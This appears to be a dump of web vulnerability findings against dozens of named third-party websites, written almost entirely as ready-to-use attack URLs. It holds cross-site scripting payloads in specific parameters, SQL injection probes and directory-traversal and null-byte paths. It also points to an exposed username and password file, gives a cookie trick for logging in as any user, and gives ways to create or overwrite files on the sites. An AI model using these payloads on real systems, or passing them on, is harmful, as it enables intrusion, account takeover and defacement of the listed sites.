agentsteal

Array: http://www.themespot.info/blog/article.php?id_art[] Array: http://www.themespot.info/blog/topic.php?id_top[] Cross Site Scripting: http://www.themespot.info/blog/article.php?id_art=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/index.php?page=themes&sortorder="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/index.php?page=themes&sortby="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themespot.info/blog/topic.php?id_top=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you upload a theme. Drop Down Menu: If you edit the drop down menus on http://www.themespot.info/index.php?page=themes you can submit arbitrary values. Full Path Disclosure: http://www.themespot.info/~gamerz Full Path Disclosure: http://www.themespot.info/Files/ Full Path Disclosure: http://www.themespot.info/Files/home.php Full Path Disclosure: http://www.themespot.info/index.php?page=themes&pageno=a SQL Error: http://www.themespot.info/blog/article.php SQL Error: http://www.themespot.info/blog/topic.php SQL Injection: http://www.themespot.info/blog/article.php?id_art=5 AND 1=1 http://www.themespot.info/blog/article.php?id_art=5 AND 1=2 SQL Injection: http://www.themespot.info/blog/topic.php?id_top=2 AND 1=1 http://www.themespot.info/blog/topic.php?id_top=2 AND 1=2 User Enumeration: http://www.themespot.info/~gamerz User Enumeration: http://www.themespot.info/~root

Cross Site Scripting: http://us.scriptscribes.net/_<marquee>vulnerable</marquee> Full Path Disclosure: http://www.scriptscribes.net/projects/us/user_system/modules/acp.php User Enumeration http://www.scriptscribes.net/~nobody User Enumeration: http://www.scriptscribes.net/~root User Enumeration: http://www.scriptscribes.net/~scriptsc

Array: http://www.themafiaman.com/confirm.php?referer[] Array: http://www.themafiaman.com/signup.php?step[] Array: http://www.themafiaman.com/signup.php?step=3&age[] Array: http://www.themafiaman.com/signup.php?step=3&cpassword[] Array: http://www.themafiaman.com/signup.php?step=3&email[] Array: http://www.themafiaman.com/signup.php?step=3&first[] Array: http://www.themafiaman.com/signup.php?step=3&last[] Array: http://www.themafiaman.com/signup.php?step=3&messager_id[] Array: http://www.themafiaman.com/signup.php?step=3&password[] Array: http://www.themafiaman.com/signup.php?step=3&refer[] Array: http://www.themafiaman.com/signup.php?step=3&username[] Array: http://www.themafiaman.com/signup.php?step=4&email[] Array: http://www.themafiaman.com/signup.php?step=4&referer[] Cross Site Scripting: http://www.themafiaman.com/confirm.php?referer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&age="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&cpassword="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&first="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&last="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&messager_id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&password="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&refer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=3&username="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=4&email=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.themafiaman.com/signup.php?step=4&referer="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/confirm.php if the email address contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/resend.php if the email address contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/support.php if the To field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Your Name field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Name field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Friends Email field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/tellthem.php if the Refferal Link field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.themafiaman.com/winners.php if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting if you submit a directory search that contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a family search that contains code. Drop Down Menu: If you edit the drop down menu on http://www.themafiaman.com/winners.php you can submit arbitrary values. Drop Down Menu: If you edit the round drop down menu on http://www.themafiaman.com/credits.php you can submit arbitrary values. Maximum Length: If you edit the fields you can remove the maximum lengths. User Enumeration: http://www.themafiaman.com/~root

Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. URL Inclusion: http://www.iraqresearch.org/go/google.com User Enumeration: http://www.iraqresearch.org/~nobody User Enumeration: http://www.iraqresearch.org/~root

Cross Site Scripting: There is Cross Site Scripting in the messages if the name contains code. Cross Site Scripting: There is Cross Site Scripting if the namecookie cookie contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum name length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the shoutbox if the Maximum name length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Number of shouts to display field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum shout length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the shoutbox the Maximum shout length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Add a space in words longer than (chars) field contains ">code. There is Cross Site Scripting in the admin panel if the Main text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Main text font family field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text font family field contains </style>code. There is Cross Site Scripting in the admin panel if the Main text font size (pt) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main text font size (pt) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shoutboxer border color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Shoutboxer border color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shoutboxer border size (px) field contains ">code. There is Cross Site Scripting in the shoutbox if the Shoutboxer border size (px) field contains </style>code. There is Cross Site Scripting in the admin panel if the Header writing field contains ">code. There is Cross Site Scripting in the shoutbox if the Header writing field contains code. There is Cross Site Scripting in the admin panel if the Header background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Header background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Header text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Header text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Shout button value field contains ">code. There is Cross Site Scripting in the shoutbox if the Shout button value field contains ">code. There is Cross Site Scripting in the admin panel if the Main form background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Main form background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input border color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input border color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input border size (px) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input border size (px) field contains </style>code. There is Cross Site Scripting in the admin panel if the Form input text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Form input text color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the First shout row background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the First shout row background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Alternating shout row background color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Alternating shout row background color (hex) field contains </style>code. There is Cross Site Scripting in the admin panel if the Ban notification text color (hex) field contains ">code. There is Cross Site Scripting in the shoutbox if the Ban notification text color (hex) field contains </style>code. Cross Site Scripting: There is Cross Site Scripting if the Sort by drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting if the Sort by drop down menus contain ">code. Cross Site Scripting: There is Cross Site Scripting if the Shouts per page field contains code. Cross Site Scripting: There is Cross Site Scripting if you ban a word that contains code. Cross Site Scripting: There is Cross Site Scripting if you ban an ip address that contains code. Drop Down Menu: If you edit the Order drop down menu you can submit arbitrary values. Drop Down Menu: If you edit the Sort by drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.diondesign.net/index.php?p=contact Full Path Disclosure: http://www.diondesign.net/index.php?p=images Full Path Disclosure: http://www.diondesign.net/index.php?p=scripts Full Path Disclosure: http://www.diondesign.net/index.php?p=services Full Path Disclosure: http://www.diondesign.net/index.php?p=websites Full Path Disclosure: http://www.diondesign.net/shoutboxer/sbxr_get.php Full Path Disclosure: http://www.diondesign.net/shoutboxer/sbxr_send.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Full Path Disclosure: There is Full Path Disclosure if the Number of shouts to display in the admin panel is set to an invalid value. Full Path Disclosure: There is Full Path Disclosure if the Shouts per page field contains an invalid value. Maximum Length: If you edit the fields in the admin panel you can remove the maximum lengths. Maximum Length: If you edit the message field you can remove the maximum length. Maximum Length: If you edit the name field you can remove the maximum length. SQL Error: There is an SQL Error in the admin panel if there are no messages. SQL Error: There is an SQL Error if the Order drop down menus contain an invalid value. SQL Error: There is an SQL Error if the Sort by drop down menus contain an invalid value. User Enumeration: http://www.diondesign.net/~kjdion

Array: http://student.cse.fau.edu/~gstark1/php/includes/restaurants.php?start[] Array: http://student.cse.fau.edu/~gstark1/php/includes/rot_13.php?input[] Cross Site Scripting: http://student.cse.fau.edu/~gstark1/php/includes/restaurants.php?start='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://student.cse.fau.edu/~gstark1/php/includes/rot_13.php?input=<znedhrr><u1>ihyarenoyr</znedhrr> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Full Path Disclosure: http://student.cse.fau.edu/~gstark1/php/includes/database_connect.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Includes Directory: http://student.cse.fau.edu/~gstark1/password/ Includes Directory: http://student.cse.fau.edu/~gstark1/php/

Cross Site Scripting: There is Cross Site Scripting on http://alliedcreed.awardspace.com/bank/bank.php if the withdraw field contains code. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. DOS: http://alliedcreed.awardspace.com/players.php/ DOS: http://alliedcreed.awardspace.com/test.php/ DOS: http://alliedcreed.awardspace.com/town.php/ DOS: http://alliedcreed.awardspace.com/updates.php/ Full Path Disclosure: http://alliedcreed.awardspace.com/forum/acforum.php Full Path Disclosure: http://alliedcreed.awardspace.com/forum/bsforum.php Full Path Disclosure: http://alliedcreed.awardspace.com/forum/connect.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. User Enumeration: http://alliedcreed.co.nr/~nobody User Enumeration: http://alliedcreed.co.nr/~root

Cross Site Scripting: There is Cross Site Scripting on the forgot password page if your email address contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Full Path Disclosure: http://www.thirdoctave.com/page_footer.php Full Path Disclosure: http://www.thirdoctave.com/test/test/echo.php Full Path Disclosure: http://www.thirdoctave.com/test/test/test.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.thirdoctave.com/~root User Enumeration: http://www.thirdoctave.com/~thirdoct

Admin Access: Anyone can access the admin panel. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: There is Cross Site Scripting in the chat if a message contains code. Directory Transversal: http://www.roddzilla.com/?page=../index Directory Transversal: http://www.roddzilla.com/?page=../modules/do Full Path Disclosure: http://www.roddzilla.com/?page[] Full Path Disclosure: http://www.roddzilla.com/pages/fbchat.php Full Path Disclosure: http://www.roddzilla.com/img.php Full Path Disclosure: http://www.roddzilla.com/img.php?t[] Full Path Disclosure: http://www.roddzilla.com/img.php?t&s[] Includes Directory: http://www.roddzilla.com/modules/ Includes Directory: http://www.roddzilla.com/pages/ Poison Null Byte: http://www.roddzilla.com/?page=../images/banner.jpg%00

Array: http://www.games4uonline.com/mylogos/download.php?name[] Array: http://www.games4uonline.com/mylogos/test3.php?name[] Array: http://www.games4uonline.com/mylogos/view.php?name[] Cross Site Scripting: http://www.games4uonline.com/mylogos/view.php?name='><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.games4uonline.com/mylogos/view.php?name=</title><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name=a Full Path Disclosure: http://www.games4uonline.com/mylogos/test2.php?name[] Full Path Disclosure: http://www.games4uonline.com/mylogos/test3.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php?name=a Full Path Disclosure: http://www.games4uonline.com/mylogos/test4.php?name[] Insecure Cookie: You shouldn't put the ipaddress in the cookie.

Array: http://www.writebush.com/search.php?words[] Cross Site Scripting: http://www.writebush.com/search/"><marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.writebush.com/search.php?cmd[] Full Path Disclosure: http://www.writebush.com/search.php?words[] Full Path Disclosure: http://www.writebush.com/theletter.php?page Full Path Disclosure: http://www.writebush.com/theletter.php?page[]

Array: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file[] Cross Site Scripting: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file="><marquee><h1>vulnerable</marquee> Directory Transversal: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=../../oshkosh/Glenn Oshkosh/DSCN5637.JPG DOS: http://ryan.crawford.com/yjfc/flyin07/?act=auth Full Path Disclosure: http://ryan.crawford.com/yjfc/flyin07/?v=meta Full Path Disclosure: http://ryan.crawford.com/yjfc/flyin07/?v=meta&file=a

CAPTCHA: The solution for the CAPTCHA is on the page. CAPTCHA: You can bypass the CAPTCHA by setting the showverify cookie to false. Cross Site Scripting: There is Cross Site Scripting if you set the lastimage cookie to ">code. Directory Transversal: There is Directory Transversal if you set the lastimage cookie to ../icons/a.gif.

Admin Access: You can view and edit the site's source code through the Directory Transversal. Array: http://www.games4uonline.com/sites/write.php?file[] Array: http://www.games4uonline.com/sites/writenew.php?file[] Cross Site Scripting: There is Cross Site Scripting if the File Name field on http://www.games4uonline.com/sites/new.php contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the folder field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the myFile3 field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.games4uonline.com/sites/upload/flash_upload.php if the submit field contains code. Cross Site Scripting: http://www.games4uonline.com/sites/writenew.php?file='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting There is Cross Site Scripting if the Folder Name field on http://www.games4uonline.com/sites/newfolder.php contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Directory Transversal: http://www.games4uonline.com/sites/new.php?folder=../ Directory Transversal: http://www.games4uonline.com/sites/newfolder.php?folder=../ Directory Transversal: http://www.games4uonline.com/sites/writenew.php?file=../index.html Directory Transversal You can make folders in any directory by registering with the username set to ../filename. DOS: There is a DOS when you register. Full Path Disclosure: http://www.games4uonline.com/sites/login/register2.php Full Path Disclosure: http://www.games4uonline.com/sites/write.php Full Path Disclosure: http://www.games4uonline.com/sites/writenew.php?file=a Full Path Disclosure: There is Full Path Disclosure when you register. Full Path Disclosure: There is Full Path Disclosure when you register if you submit a null username. Full Path Disclosure: There is Full Path Disclosure when you register if your username has already been registered. Full Path Disclosure: There is Full Path Disclosure when you register if your username is the name of a folder. Includes Directory: http://www.games4uonline.com/sites/login/ Insecure Cookie: You shouldn't put the ip address in the cookie. There is a list of usernames and passwords: http://www.games4uonline.com/sites/login/userpwd.txt You can make files and folders on the site. http://www.games4uonline.com/sites/files.php POC: http://www.games4uonline.com/sites/agentsteal.html You can make folders on the site by registering with the username set to the filename. You can edit files on the site. http://www.games4uonline.com/sites/writenew.php?file=index.htm

Array: http://www.best-nights-out.com/index.php?page[] Cross Site Scripting: There is Cross Site Scripting if the genre field contains code. Cross Site Scripting: There is Cross Site Scripting if you submit a search that contains '>code. Cross Site Scripting: There is Cross Site Scripting if you submit code in the add drop down menus. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contains '>code. Directory Transversal: http://www.best-nights-out.com/index.php?page=src/mailer Drop Down Menu: If you edit the drop down menus in the header you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the add page you can submit arbitrary values. Drop Down Menu: If you edit the Favorite Music drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.best-nights-out.com/index.php?page=browse Full Path Disclosure: http://www.best-nights-out.com/browse.php Full Path Disclosure: http://www.best-nights-out.com/src/common.php Full Path Disclosure: http://www.best-nights-out.com/home.php Full Path Disclosure: http://www.best-nights-out.com/index.php?page=a Full Path Disclosure: http://www.best-nights-out.com/logout.php Full Path Disclosure: There is Full Path Disclosure if you submit an invalid value in the Country drop down menu in the header. Include Directory: http://www.best-nights-out.com/src/ PHP Source Code Disclosure: http://www.best-nights-out.com/src/common.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/contact.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/dbcommon.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/htmldata.php~ PHP Source Code Disclosure: http://www.best-nights-out.com/src/java.js~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/any/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/alternative/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/dance_club/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/emo/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/goth/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/jazz/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/metal/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/pop/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/punk/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/r&b_hip-hop/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/reggae/Style.css~ PHP Source Code Disclosure: http://www.best-nights-out.com/css/rock/Style.css~ SQL Error: There is an SQL Error if you submit invalid values in the add drop down menus. SQL Error: There is an SQL Error if you submit an invalid value in the Favorite Music field.

Cross Site Scripting: There is Cross Site Scripting if the remember cookie contains ">code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Full Path Disclosure: http://www.my-linkpage.com/scripts/connection.class.php PHP Source Code Disclosure: http://www.my-linkpage.com/scripts/ URL Inclusion: There is a URL Inclusion vulnerability on http://www.my-linkpage.com/scripts/form.html if you search for a URL. User Enumeration: http://www.my-linkpage.com/~root User Enumeration: http://www.my-linkpage.com/~stlewis

Array: http://www.campuscrawler.com/goodstats/?add=1&url2[] Array: http://www.campuscrawler.com/goodstats/index.php?page[]&code=1 Cross Site Scripting: http://www.campuscrawler.com/goodstats/index.php?page=</textarea><marquee><h1>vulnerable&code=1 Cross Site Scripting: There is Cross Site Scripting if you submit code in the drop down menus in the calendar. Cross Site Scripting: There is Cross Site Scripting on the Edit a Page page if the fields contain </textarea>code. Drop Down Menu: If you edit the drop down menus in the calendar you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.campuscrawler.com/goodstats/map.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the Calibrate Heat Map page you can submit arbitrary values. Full Path Disclosure: http://www.campuscrawler.com/goodstats/index.php?view=1&page=a Full Path Disclosure: http://www.campuscrawler.com/goodstats/graph.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/graph2.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/report.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/report2.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/includes/showtool.php Full Path Disclosure: http://www.campuscrawler.com/goodstats/map.php?page=a Full Path Disclosure: http://www.campuscrawler.com/goodstats/templates/sidebar.php Full Path Disclosure: There is Full Path Disclosure if you submit invalid values in the drop down menus in the calendar. Includes Directory: http://www.campuscrawler.com/goodstats/includes/ Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie.

Array: http://www.getyourlinkon.net/links.php?type[] Array: http://www.getyourlinkon.net/member.php?user[] Cross Site Scripting: http://www.getyourlinkon.net/links.php?type='><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you add a link if the filename contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://www.getyourlinkon.net/test.php

Full Path Disclosure: http://www.mobilereelz.com/test.php Includes Directory: http://www.mobilereelz.com/temp/

Log: http://forumpix.getmyip.com/log.txt User Enumeration: http://forumpix.getmyip.com/~nobody

Cross Site Scripting: There is Cross Site Scripting on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=seedsofinterest if the Number of Seeds of Interest field contains code. Drop Down Menu: If you edit the Seed drop down menu on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=fillrequest you can submit arbitrary values. Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image. Full Path Disclosure: There is Full Path Disclosure on http://www.brentmorine.com/seedswaps/site_pages/index.php?do=fillrequest if you set the Seed drop down menu to a negative number. User Enumeration: http://www.brentmorine.com/~brentmor User Enumeration: http://www.brentmorine.com/~nobody User Enumeration: http://www.brentmorine.com/~root User Enumeration: http://www.seedswaps.com/~brentmor User Enumeration: http://www.seedswaps.com/~nobody User Enumeration: http://www.seedswaps.com/~root

Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/phpinfo.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/menu.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/link-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/page-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/style-switcher.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/title-switcher.php/<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/phpinfo.php Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/phpinfo.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/ Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/footer.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/index.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Navigation/menu.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/link-switcher.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/page-switcher.php/ Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/style-switcher.php/a Full Path Disclosure: http://h1.ripway.com/Bethrezen/demo/Web-Site-Demo/Switch/title-switcher.php/a

Array: http://www.getyourlinkon.net/member.php?user[] Array: http://www.getyourlinkon.net/viewrequest.php?title[] Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting on the Links page if the fields contain 'code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.getyourlinkon.net/member.php?user=../request/agentsteal Directory Transversal: You can make txt files in any directory by registering with the username set to ../filename. Directory Transversal: You can make txt files in any directory by requesting a link with the title set to ../filename. Full Path Disclosure: http://www.getyourlinkon.net/test.php Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by setting the auth cookie to their username. You can make txt files in http://www.getyourlinkon.net/members/ by registering with the username set to the filename. You can make txt files in http://www.getyourlinkon.net/request/ by requesting a link with the title set to the filename.

Drop Down Menu: If you edit the Rate drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.pokerdepositoptions.com/admin/admin.php Includes Directory: http://www.pokerdepositoptions.com/admin/ Includes Directory: http://www.pokerdepositoptions.com/includes/ Includes Directory: http://www.pokerdepositoptions.com/new/ Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.pokerdepositoptions.com/~poker User Enumeration: http://www.pokerdepositoptions.com/~root

Array: http://infinitevortex.6te.net/memberscript/account.php?user[] Cross Site Scripting: http://infinitevortex.6te.net/memberscript/account.php?user="onmouseover=alert('vulnerable')> User Enumeration: http://infinitevortex.6te.net/~root